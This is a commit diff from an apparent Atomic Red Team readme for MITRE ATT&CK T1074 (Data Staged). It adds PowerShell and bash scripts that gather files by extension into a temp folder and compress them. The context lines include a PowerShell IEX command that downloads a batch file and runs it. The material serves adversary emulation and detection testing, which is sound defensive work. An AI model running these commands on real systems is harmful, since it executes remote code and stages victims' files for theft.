T1074/collect-n-compress-file-types: Outlined a new collection > data staged attack type (collect n compress file types) within the T1074.md readme. Also raised a few questions on best practices
This commit is contained in:
nicholasaleks
@@ -15,6 +15,7 @@ Data Sources: File monitoring, Process monitoring, Process command-line paramete
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
|
||||
- [Atomic Test #2 - Collect all files extensions and stage within a compressed directory](#atomic-test-1---compress-all-file-types)
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -30,3 +31,77 @@ Utilize powershell to download discovery.bat and save to a local file
|
||||
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
|
||||
```
|
||||
<br/>
|
||||
<hr/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Collect and Compress all file types
|
||||
Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
|
||||
|
||||
**Supported Platforms:**
|
||||
- Windows
|
||||
- Linux
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
Note:
|
||||
- ```{{ path }}```: requires a default path to start recursive search from
|
||||
- ```{{ extension }}```: requires a file extension to search for
|
||||
|
||||
```
|
||||
$FolderPath = '{{ path }}'
|
||||
$FileExtension = '{{ extension }}'
|
||||
|
||||
New-Item -ItemType directory -Path C:\temp\staging
|
||||
|
||||
function TestPath()
|
||||
{
|
||||
$FileExists = Test-Path $FolderPath
|
||||
If ($FileExists -eq $True)
|
||||
{
|
||||
Return $true
|
||||
}
|
||||
Else
|
||||
{
|
||||
Return $false
|
||||
}
|
||||
}
|
||||
|
||||
function ZipFiles()
|
||||
{
|
||||
Add-Type -Assembly System.IO.Compression.FileSystem
|
||||
$compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
|
||||
[System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging",
|
||||
"C:\temp\staging.zip", $compressionLevel, $false)
|
||||
}
|
||||
|
||||
$Result = (TestPath($FolderPath));
|
||||
|
||||
If ($Result)
|
||||
{
|
||||
$Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore
|
||||
$List = $Dir | where {$_.extension -eq $FileExtension}
|
||||
$List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore
|
||||
}
|
||||
else
|
||||
{
|
||||
"Folder path is incorrect."
|
||||
}
|
||||
|
||||
ZipFiles
|
||||
|
||||
Remove-Item -Recurse -Force C:\temp\staging
|
||||
|
||||
```
|
||||
|
||||
#### Run it with `bash`!
|
||||
Note:
|
||||
- ```{{ path }}```: requires a default path to start recursive search from
|
||||
- ```{{ extension }}```: requires a file extension to search for
|
||||
|
||||
```
|
||||
mkdir -p /tmp/staging
|
||||
find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
|
||||
tar -zcvf /tmp/staging.tar.gz /tmp/staging/
|
||||
rm -rf /tmp/staging
|
||||
```
|
||||
<br/>
|
||||
|
||||
Reference in New Issue
Block a user